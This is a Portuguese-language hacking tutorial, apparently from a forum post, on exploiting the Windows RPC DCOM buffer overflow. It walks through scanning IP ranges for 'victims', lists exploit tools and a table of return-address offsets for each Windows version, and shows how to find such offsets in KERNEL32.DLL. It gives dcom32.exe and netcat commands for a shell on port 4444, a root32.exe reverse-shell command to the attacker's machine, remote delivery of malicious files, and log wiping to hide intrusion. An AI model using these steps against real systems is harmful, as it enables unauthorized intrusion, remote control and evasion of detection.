Hackeando o RPC do Windows

EXPLORANDO A FALHA DE RPC (CHAMADA PROCEDURAL REMOTA)

Os mais leigos devem está se perguntando “eu já vi isso em algum lugar?”, é isso mesmo...tem haver com aquele worm W32/Lovsan.A, W32/Lovsan.B, W32/Lovsan.C e variantes...E como sempre a MS já colocou um “Tapa Buraco” pro Windows XP e 2000, mas ainda não tem pro Windows 2003 e NT (aproveitem enquanto podem ;)), e Systemantec e Mcaffe já lançaram suas curas, e também já estão rolando uns “Limpadores” pela rede tipo o f-lovsan e dcomkill.

I – Preparativos

Para você se aproveitar dessa nova falha do MS, nas versões do Ruindows NT (SP4-SP6a), XP (SP1/SP1A) 2000 (SP1/2/3/4) e 2003. Você primeiramente tem que baixar esses programas:

RPC GUI v2 - r3L4x.exe (o programa é muito bom, mas o scanner dele é uma merda, e também dá pra abrir o FTP no seu PC e assim enviar arquivos maliciosos pra vítima)

Pinkhg.exe (esse programa verifica qual é a versão do rwindows da vitima).

RpcScan.exe (faz uma varredura perfeita no pc da vitima, muito bom mesmo!!)

RetinaRPCDCOM.exe (um bom scanner)

Angry IP Scanner (é o melhor scanner)

Recomendo, que você use um dos Ruindows citados acima que você tenha total proveito tanto das ferramentas como do ambiente. Há existem programas em versão DOS, mas esse texto se destina ao Iniciates, Lammers e Curioso (os de DOS funcionam bem melhor dos que tem GUI)...vou mostrar como funcional no final desse tutorial...

Obs-1: a quem usa o Windows XP ou 2000, você está sujeito a se fuder...

Obs-2: recomendo usem a partir de hoje o Windows 9x, é mais “seguro”.

II – Iniciando a Invasão

Primeiramente pegue seu scanner, e mande-o scanner um IP qualquer (Exemplo-01: 192.168.0.1 até 192.168.0.254) nas Portas 135, 139, 445 e 539 (essas são as principais portas onde esse erro ocorre, mas pode ocorrer em outras e caso seu scanner tenha “farejador” de SHELL mande localizar também). Para isso use os programas:

RPC GUI v2 - r3L4x.exe e RpcScan.exe

Usando essas duas ferramentas em conjunto, se torna uma ótima Maquina Mortífera; por exemplo: Use o RPC GUI v2 - r3L4x.exe, para localizar um Vítima,, e depois use o RpcScan.exe para saber qual é o S.O., melhor porta para explorar, porta Shell e que Endereço de Retorno(isso é uma especificação hexadecimal que varia de s.o. para s.o.)

OK, após pegar o IP da vitima e fazer uma varredura minuciosa, então vamos agora a o que interessa, A INVASÂO:

Abra o RPC GUI v2 - r3L4x.exe, coloque o IP da vitima, selecione o S.O., a porta, a porta Shell e Endereço de Resposta

Depois disso você pode fazer o que quiser com a vitima (os lammers como sempre vão deletar tudo!!!)...Você usará o Servidor FTP do RPC GUI v2 - r3L4x.exe, para mandar arquivos para o Pc da vitima e executá-los remotamente (vocês já sabem o que...). Exemplo-03: para que esta técnica dê certo Clique no botão START, assim seu PC vira um servidor FTP.

III - Endereço de Retorno (Resposta) dos Windows XXXX:

WinntSP4eng = e527f377 English WinNT SP4

WinntSP5cn = cfdaee77 china WinNT SP5

WinntSP6cn = ac0ef077 china WinNT SP6

WinntSP6acn = c3eaf077 china NT SP6a

Win2knoSPpl = 4d3fe377 polish Win2k noSP ver 5.00.2195

Win2kSP3pl = 292ce477 polish Win2k SP3 - ver 5.00.2195 tested

Win2kSP4SP = 133ba577 SPanish Win2k SP4

Win2knoSPeng1 = 7416e877 english Win2k noSP 1

Win2knoSPeng2 = 6d3fe377 english Win2k noSP 2

Win2kSP1eng = ec29e877 english Win2k SP1

Win2kSP2eng1 = 2b49e277 english Win2k SP2 1

Win2kSP2eng2 = b524e877 english Win2k SP2 2

Win2kSP3eng1 = 7a36e877 english Win2k SP3 1

Win2kSP3eng2 = 5cfa2e77 english Win2k SP3 2

Win2kSP4eng = 9b2af977 english Win2k SP4

Win2knoSPchi = 2ae3e277 china Win2k noSP

Win2kSP1chi = 8b89e677 china Win2k SP1

Win2kSP2chi = 2b49e077 china Win2k SP2

Win2kSP3chi = 44434241 china Win2k SP3

Win2kSP4chi = 294cdf77 china Win2k SP4

Win2kSP3ger = 7a882e77 german Win2k SP3

Win2knoSPjap = e527f377 Japanese Win2k noSP

Win2kSP1jap = 8b89e577 Japanese Win2k SP1

Win2kSP2jap = 2b49df77 Japanese Win2k SP2

Win2knoSPkr = 2ae3e177 Korea Win2k noSP

Win2kSP1kr = 8b89e577 Korea Win2k SP1 same offset as Win2kjp_SP1 ??

Win2kSP2kr = 2b49df77 Korea Win2k SP2

Win2knoSPm = 2ae3e177 Meican Win2k noSP

Win2kSP1m = 8b89e877 Meican Win2k SP1

Win2knoSPken = 4d3fe377 Kenya Win2k SP1

Win2kSP1ken = 8b89e877 Kenya Win2k SP1

Win2kSP2ken = 2b49e277 Kenya Win2k SP1

WinpnoSPeng = e3afe977 english p noSP ver 5.1.2600

WinpSP1eng1 = ba26e677 english p SP1 1

WinpSP1eng2 = db37d777 english p SP1 2

WinpSP2eng = bd737d77 english p SP2

Win2k3noSPeng = b0542277 english Win2k3

Win2kSP3ger = 292ce377 Germanh Win2 SP3

Win2kSP4ger1 = 294ce077 German Win2 SP4 1

Win2kSP4ger2 = 56c2e277 German Win2 SP4 2

WinpSP1ger = fc18d477 German p SP1

Win2kSP1fr = 4b3ee477 French Win2k Server SP1

Win2kSP4fr = 56c2e277 French Win2k Server SP4

WinpSP0fr = 4a75d477 French Win p no SP

WinpSP1fr = fc18d477 French Win p SP 1

Win2kSP3big = 252baa77

Win2kSP4big = 294cdf77

WinpSP01big = fb7ba171

Obs: o hexadecimais que aparece logo após o sinal de igual devem ser colocados no campo de Endereço de Resposta do RPC GUI v2 - r3L4x.exe. Exemplo-05:

IV – Verificando se você está Infectado

Siga a estrada de tijolos amarelos:

Clique em Iniciar, depois em Executar e em seguida digite REGEDIT, e clique em OK.

Siga este caminho do registro agora:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update"="msblast.exe"

O “msblast.exe” fica alocado neste diretório do sistema: c:\windows\system32 ou c:\winnt\system32.

E faça algo a respeito...

V - Álbum de fotos dos ERROS FATAIS que aparecem no Ruindows: (em primeira mão...)

VI – TESTES

Os teste foram feitos entre duas máquinas minha: uma rodando o Win98SE e o Lindows e a outra com o WinXP, depois com Win2k e Win2k+. Funcionou tudo perfeitamente, melhor do que eu esperava. E Depois testei em Computadores Remotos, claro...;).

VII - Não me pergunte isso:

0) O que é RPC?

RPC é nada mais, nada menos que um Estouro de Pilha do Ruindows (Buffer OverFlows), no qual nós podemos no conectar a pc da vitima.

1) Como eu acho o endereço de retorno certo para meu sistema?

- Pegue o arquivo KERNEL32.DLL (você pode achar isto diretamente no arquivo SP).

- Abra-o no seu disassembler favorito (IDA, WDASM,...).

- Olhe para a seguinte sucessão de byte: "FF D3" (chamesse ebx).

- Note que o endereço correspondente (deveria se parecer 0x7???????, caso contrário seu disassembler não é inteligente bastante para somar a seção de endereço básico para endereços relativos).

2) Por que é tão difícil de fazer isto coisa funcionar?

Aparte do endereço de retorno há outra dificil-codificação valida dentro do provido exploit: o bloco de dados de linha (thread data block). Este local da memória deve ser "preenchido" (apto a escrita) caso contrário o exploit falhará com um erro de "violação de acesso" antes de alcançar o código shell.

3)Isto funciona com Windows NT4?

Eu acho que esse exploit não é diretamente compatível com Windows NT4, porque Há uma mudança majoritária entre o Windows NT4 e o Windows 2000+:

- O serviço de RPC no Windows NT4 é "RPCSS.EXE"

- O serviço de RPC no Windows 2000+ é "SVCHOST.EXE e RPCSS.DLL"

Casuamente essas são as tais mudanças afetará a portabilidade do exploit. O TDB (thread data block) pode ter mudado de local também.

4) Isto funciona com Windows 2003?

Eu fiz alguns testes e parece-me que como no Windows 2003 são 4 bytes a menos dentro da pilha na hora de RET (talvez uma função interna de RPC do RPCSS.DLL tenha uma contador de parâmetro diferente). Mudança leve no código do exploit também é preciso.

5) Por que meu computador reinicia (na primeira vez, na segunda vez, etc.)?

Se o exploit falhar por qualquer razão, o serviço de RPCSS vai SEGFAULT (seguirá a padrão) e a configuração padrão do Windows manda reiniciar o computador dentro de 1 minuto. Você pode configurar este comportamento com os "serviços" do componente administrativo.

Se você tiver bastante sorte de adquirir uma shell, assim que você fechá-la o serviço RPC parará . Isto fará seu computador reiniciar também...

6)Por que você recomenda usa os Win9x (OBS-1)?

Por que para quem gosta de Assembly, se torna fácil achar uma brecha (mesmo que você esteja com Patcheado pela MS e com o Antivírus atualizado).

Obs: Caso você queira mexer nisso mais afundo, você de ser um GURU de Assembly. ;)

VIII – Usando o Prompt de Comando

01) Ferramentas

Primeiramente tenha em seu computador o DLL cygwin.dll, senão nada funcionará.

Baixe os programas:

· Dcom32.exe

· NC.exe

· Root32.exe

02) Iniciando Invasão

Primeiro crie uma pasta na raiz do seu sistema, exemplo C:\hack, e coloque neste diretório os quatros arquivos anteriores.

Antes de qualquer coisa você já deve ter scanneado algum IP de uma determinada vitíma e ter certeza que ela está vulnerável.

Agora abra o Prompt de Comando ou Prompt do MS-DOS (cmd.exe ou command.exe), dependendo da versão do Windows que você tenha. E então se dirija ao local onde você colocou os arquivos (neste caso C:\hack, e eu não vou dar aula de DOS). Então abra o programa dcom32.exe, ele usa a seguinte sintaxe:

C:\ dcom32.exe <verão do S.O. & Service Pack> <IP da Vitima>

Exemplo: C:\hack\dcom32.exe 2 192.168.0.2

Obs1: Caso der errado mude Service Pack, o números 6 e 5 estão ligados ao Windows XP e Windows XP SP1, por exemplo. Mais informações veja o AJUDA do programa.

Se tudo ocorrer bem você deve pegar uma shell para se conectar na porta 4444. E em seguida abra o programa NC.exe. Sua sintaxe é a seguinte (NC = NetCat):

C:> nc -vvv IP_da_Vitima Porta

Exemplo: C:\hack\nc.exe 192.168.0.2 4444

Obs2: Você pode usar a porta que você achar melhor.

E pronto você está conectado a vitima.

Caso queira implementar mais ainda sua invasão, abra o programa Root32.exe (depois dos dois programas citados acima claro). Aqui está sua sintaxe:

C:\ root32.exe 172.0.15.29 64.252.136.135 1199 2

IP Remoto^ IP da sua Maquina^ Sua PORTA^ ^Service Pack

da Vítima

Se tudo ocorrer bem você deve receber uma linha-de-comando para conectar-novamente através do netcat (nc.exe) na caixa do prompt vulnerável. Isso que vai aparecer:

morning_wood's quick n grimy bat file Root.bat

<snip>

root32 %1 %2 %3 2

nc -vv %1 %3

</snip>

IX – Limpando os Rastros

Para apagar os “temíveis” arquivos LOG’s. Use o programa clearlog.exe. O qual você pode executar remotamente.

X – Locais de Consulta

http://illmob.org/rpc

http://www.net-security.org/

www.astalavista.com

http://www.google.com.br

"Por favor não deixe de votar no site preciso realmente dos votos, eu sei que gastara 1 minuto a + do seu precioso tempo, mas eu realmente preciso muito!!!".